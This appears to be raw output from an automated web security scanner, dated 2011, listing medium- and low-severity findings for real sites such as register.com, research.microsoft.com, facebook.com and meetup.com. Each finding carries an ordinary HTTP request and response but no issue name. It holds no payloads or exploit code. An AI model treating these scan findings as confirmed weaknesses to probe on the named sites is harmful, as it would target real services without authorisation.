GET /m2/omnituremarketing/sc Host: omnituremarketing.tt User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.omniture.com |
HTTP/1.1 200 OK Content-Length: 146 Date: Sat, 03 Sep 2011 14:44:01 GMT Server: Test & Target if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get( |
Severity: | Medium |
Confidence: | Firm |
Host: | http://registercom.tt |
Path: | /m2/registercom/mbox |
GET /m2/registercom/mbox Host: registercom.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi_holtihx7Bhabx7Dhx7F= |
HTTP/1.1 200 OK pragma: no-cache Content-Type: text/javascript Content-Length: 797 Date: Sat, 03 Sep 2011 21:29:23 GMT Server: Test & Target var mboxCurrent=mboxFactories ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://registercom.tt |
Path: | /m2/registercom/sc |
GET /m2/registercom/sc Host: registercom.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi_holtihx7Bhabx7Dhx7F= |
HTTP/1.1 200 OK Content-Length: 220 Date: Sat, 03 Sep 2011 21:32:51 GMT Server: Test & Target if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get( ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://research.microsoft |
Path: | /en-us/about/awards.aspx |
GET /en-us/about/awards.aspx HTTP/1.1 Host: research.microsoft.com Proxy-Connection: keep-alive Referer: http://research.microsoft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MC1=GUID=f4593467ede |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 13:06:03 GMT Content-Length: 149173 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <!-- v:10.0.7.12 --> <head id="ctl00_ctl00_HeadTag"> ...[SNIP]... ing paper on the principles of distributed computing, the significance and impact of which on the theory and/or practice of distributed computing has been evident for at least a decade. Recognized for <A href="http://delivery.acm ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://research.microsoft |
Path: | /en-us/people/ajbrush |
GET /en-us/people/ajbrush Host: research.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 13:27:08 GMT Connection: close Content-Length: 86504 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <!-- v:10.0.7.12 --> <head id="ctl00_ctl00_HeadTag"> ...[SNIP]... <LI><A href="http://portal.acm ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://research.microsoft |
Path: | /en-us/um/people/ymwang/ |
GET /en-us/um/people/ymwang/ HTTP/1.1 Host: research.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Mon, 01 Aug 2011 17:09:19 GMT Accept-Ranges: bytes ETag: "a68445c06d50cc1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 13:25:06 GMT Connection: close Content-Length: 169997 <html xmlns:v="urn:schemas xmlns:o="urn:schemas xmlns:w="urn:schemas xmlns:x="urn:schemas xml ...[SNIP]... </span> and rollback-recovery and was a main co-author of the most influential <a href="http://portal.acm style='color:black;mso ...[SNIP]... <span style='font-size: 11.0pt;mso-bidi-font-size href="http://portal.acm style='color:#EAEAEA;text ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.facebook.com |
Path: | /extern/login_status.php |
GET /extern/login_status.php Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.meetup.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: campaign_click_url= |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.51.64 X-Cnection: close Date: Sat, 03 Sep 2011 13:11:37 GMT Content-Length: 241 <script type="text/javascript"> parent.postMessage("cb ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.meetup.com |
Path: | /api/ |
GET /api/?method=storeStart Host: www.meetup.com Proxy-Connection: keep-alive Referer: http://www.meetup.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MEETUP_MEMBER=id=0&status |
HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 13:11:40 GMT Server: Apache-Coyote/1.1 Expires: 0 X-Meetup-server: app9.int.meetup.com Content-Type: application/json;charset Content-Language: en-US Vary: Accept-Encoding,User Content-Length: 2 Connection: close "" |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.register.com |
Path: | /css/home-optimized.css |
GET /css/home-optimized.css Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 302 Found Date: Sat, 03 Sep 2011 21:31:36 GMT HostName: atleuapp02.galt.register Location: http://www.register.com Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.register ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.register.com |
Path: | /js/aop-attach.js |
GET /js/aop-attach.js Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 302 Found Date: Sat, 03 Sep 2011 21:31:41 GMT HostName: atleuapp02.galt.register Location: http://www.register.com Content-Length: 224 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.register ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.register.com |
Path: | /js/homepage-optimized.js |
GET /js/homepage-optimized.js Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 302 Found Date: Sat, 03 Sep 2011 21:31:55 GMT HostName: atleuapp02.galt.register Location: http://www.register.com Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.register ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.register.com |
Path: | /js/jquery-1.3.2.min.js |
GET /js/jquery-1.3.2.min.js Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.register.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 302 Found Date: Sat, 03 Sep 2011 21:31:41 GMT HostName: atleuapp02.galt.register Location: http://www.register.com Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.register ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.sslmatrix.com |
Path: | /Order/quickorder |
GET /Order/quickorder?pid=1 Host: www.sslmatrix.com Connection: keep-alive Referer: https://www.sslmatrix.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 00:26:02 GMT Content-Length: 59992 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_ctl00_Head1"> ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTY3NTg0ODQ1 |